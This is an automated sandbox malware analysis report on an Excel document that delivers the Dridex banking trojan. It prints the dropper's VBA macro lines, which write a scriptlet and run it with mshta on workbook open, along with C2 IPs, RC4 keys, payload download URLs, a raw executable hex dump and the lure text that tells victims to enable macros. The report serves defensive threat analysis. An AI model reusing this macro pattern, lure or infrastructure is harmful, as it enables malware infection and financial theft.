Windows Analysis Report 4TWEQh2HJb

Overview

General Information

Sample Name: 4TWEQh2HJb (renamed file extension from none to xls)
Analysis ID: 448885
MD5: 40425d09e54ff26289dd074649f0cad9
SHA1: ae7e4df26092d9acf01b732c8144f0170ccc6556
SHA256: 6f8f1b26324ea0f3f566fbdcb4a61eb92d054ccf0300c52b3549c774056b8f02
Tags: excelxlsx
Infos:

Most interesting Screenshot:

Detection

Dridex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex unpacked file
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office creates scripting files
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Tries to detect virtualization through RDTSC time measurements
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 3.2.qDialogMainChartType.exe.10000000.3.unpack Malware Configuration Extractor: Dridex {"Version": 22202, "C2 list": ["202.29.60.34:443", "66.175.217.172:13786", "78.46.78.42:9043"], "RC4 keys": ["RQTJGOuDHeSyUCWzdNRZi3fWMitWY9aTc", "2UMW8pusQXiNJDgmuPITkf4TmrOt3Y13lRDWnjBuu16JkzjIG6gNuckQDkiut9pzQHVGfFdlT"]}
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\qDialogMainChartType.exe ReversingLabs: Detection: 30%
Multi AV Scanner detection for submitted file
Source: 4TWEQh2HJb.xls Virustotal: Detection: 27% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\qDialogMainChartType.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 4TWEQh2HJb.xls Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.qDialogMainChartType.exe.10000000.3.unpack Avira: Label: TR/Dropper.Gen

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\ProgramData\qDialogMainChartType.exe Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: qDialogMainChartType.exe, 00000003.00000003.2117450423.000000007DE80000.00000004.00000001.sdmp
Source: Binary string: wshom.pdb source: mshta.exe, 00000002.00000002.2363567124.0000000002730000.00000002.00000001.sdmp
Source: Binary string: Gpernfedeefe.pdb source: mshta.exe, 00000002.00000003.2105631020.0000000004D5B000.00000004.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000000.2105589757.0000000010015000.00000002.00020000.sdmp, qDialogMainChartType.exe.2.dr

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ProgramData\qRangeAutoFormatLocalFormat3.sct Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: onlinefastsolutions.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 202.29.60.34:443
Source: Malware configuration extractor IPs: 66.175.217.172:13786
Source: Malware configuration extractor IPs: 78.46.78.42:9043
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 8088
Source: unknown Network traffic detected: HTTP traffic on port 8088 -> 49165
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.15.12Date: Wed, 14 Jul 2021 18:00:06 GMTContent-Type: application/octet-streamContent-Length: 167936Connection: keep-aliveLast-Modified: Wed, 14 Jul 2021 13:48:51 GMTETag: "60eeeb43-29000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ff 81 78 c1 bb e0 16 92 bb e0 16 92 bb e0 16 92 bb e0 17 92 89 e0 16 92 b2 98 85 92 98 e0 16 92 bb e0 16 92 ba e0 16 92 b6 b2 ca 92 ba e0 16 92 b6 b2 cd 92 ba e0 16 92 b6 b2 c8 92 ba e0 16 92 52 69 63 68 bb e0 16 92 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c4 0c f0 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 40 01 00 00 50 01 00 00 00 00 00 f0 3e 01 00 00 10 00 00 00 50 01 00 00 00 00 10 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 02 00 00 10 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 52 01 00 5d 00 00 00 ec 52 01 00 68 01 00 00 00 80 02 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 01 00 00 00 10 51 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f7 38 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 0c 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 19 01 00 00 60 01 00 00 10 01 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ad 04 00 00 00 80 02 00 00 10 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 01 00 00 00 90 02 00 00 10 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 78.46.78.42 78.46.78.42
Source: Joe Sandbox View IP Address: 202.29.60.34 202.29.60.34
Source: Joe Sandbox View IP Address: 66.175.217.172 66.175.217.172
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: CMRU-AS-APChiangmaiRajabhatUniversityTH CMRU-AS-APChiangmaiRajabhatUniversityTH
Source: global traffic HTTP traffic detected: GET /tpls/file3.bin HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: qWK3FM3Host: onlinefastsolutions.com:8088
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: onlinefastsolutions.com
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://buyer-remindment.com:8088/css/file7.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://buyer-remindment.com:8088/fonts/file8.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://buyer-remindment.com:8088/tpls/file4.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp String found in binary or memory: http://buyer-remindment.com:8088/tpls/file4.bin:
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://fasteasyupdates.com:8088/vendors/file4.bin
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.comQ
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://insiderushings.com:8088/js/file13.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp String found in binary or memory: http://insiderushings.com:8088/js/file13.binj
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://onlinefastsolutions.com:8088/images/details.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/images/details.binG
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://onlinefastsolutions.com:8088/images/file13.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://onlinefastsolutions.com:8088/js/file1.bin
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/js/file1.binT
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.2369723384.0000000004D00000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.2362918799.00000000001BF000.00000004.00000020.sdmp, mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.bin
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binQ
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binX
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binc
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.bind
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://paymentadvisry.com:8088/wp-theme/file7.bin
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp String found in binary or memory: http://paymentadvisry.com:8088/wp-theme/file7.bin3.sct
Source: mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlt
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.bethmardutho.org.P
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.c-and-g.co.jp
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.ncst.ernet.in/~rkjoshi
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com;Copyright
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud:

barindex
Yara detected Dridex unpacked file
Source: Yara match File source: 3.2.qDialogMainChartType.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing at the notification yellow bat i 18 11 1 19 2.And click Enable Content in next noti
Source: Screenshot number: 4 Screenshot OCR: Enable Content in next notification. 'S :: : 3.OR Use DecryptTooi from https://shop.globalsign.com
Source: Document image extraction number: 2 Screenshot OCR: Enable Editing at the notification yellow bar. 2.And click Enable Content in next notification. 3.
Source: Document image extraction number: 2 Screenshot OCR: Enable Content in next notification. 3.OR Use DecryptTooi from https://shop.globalsign.com/en/docu
Document contains an embedded VBA macro which may execute processes
Source: 4TWEQh2HJb.xls OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Document contains an embedded VBA macro with suspicious strings
Source: 4TWEQh2HJb.xls OLE, VBA macro line: Set qLine = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: 4TWEQh2HJb.xls OLE, VBA macro line: Set qLine = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: 4TWEQh2HJb.xls OLE, VBA macro line: With CreateObject("Wscript.Shell")
Source: 4TWEQh2HJb.xls OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Source: 4TWEQh2HJb.xls OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String createtextfile: Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct") Name: WorkBook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String environ: Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct") Name: WorkBook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String wscript: With CreateObject("Wscript.Shell") Name: WorkBook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String environ: . Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34)) Name: WorkBook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String mshta: . Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34)) Name: WorkBook_Open
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ProgramData\qRangeAutoFormatLocalFormat3.sct Jump to behavior
Abnormal high CPU Usage
Source: C:\ProgramData\qDialogMainChartType.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\ProgramData\qDialogMainChartType.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\ProgramData\qDialogMainChartType.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10012840 NtAllocateVirtualMemory, 3_2_10012840
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1001223C NtDelayExecution, 3_2_1001223C
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1001326C NtProtectVirtualMemory, 3_2_1001326C
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1000BB88 NtClose, 3_2_1000BB88
Detected potential crypto function
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10010754 3_2_10010754
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10011460 3_2_10011460
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1000846C 3_2_1000846C
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10001494 3_2_10001494
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1000A52C 3_2_1000A52C
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10011D58 3_2_10011D58
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10019348 3_2_10019348
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 4TWEQh2HJb.xls OLE, VBA macro line: Sub WorkBook_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open Name: WorkBook_Open
Document contains embedded VBA macros
Source: 4TWEQh2HJb.xls OLE indicator, VBA macros: true
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: qDialogMainChartType.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@5/2@2/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREA9C.tmp Jump to behavior
Source: 4TWEQh2HJb.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 4TWEQh2HJb.xls Virustotal: Detection: 27%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct'
Source: C:\Windows\System32\mshta.exe Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct' Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: qDialogMainChartType.exe, 00000003.00000003.2117450423.000000007DE80000.00000004.00000001.sdmp
Source: Binary string: wshom.pdb source: mshta.exe, 00000002.00000002.2363567124.0000000002730000.00000002.00000001.sdmp
Source: Binary string: Gpernfedeefe.pdb source: mshta.exe, 00000002.00000003.2105631020.0000000004D5B000.00000004.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000000.2105589757.0000000010015000.00000002.00020000.sdmp, qDialogMainChartType.exe.2.dr

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\ProgramData\qDialogMainChartType.exe Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\ProgramData\qDialogMainChartType.exe Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1000F6CC push esi; mov dword ptr [esp], 00000000h 3_2_1000F6CD
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_00240142 push eax; iretd 3_2_00240143
Source: initial sample Static PE information: section name: .text entropy: 7.82504513314

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\System32\mshta.exe File created: C:\ProgramData\qDialogMainChartType.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\mshta.exe File created: C:\ProgramData\qDialogMainChartType.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 8088
Source: unknown Network traffic detected: HTTP traffic on port 8088 -> 49165
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
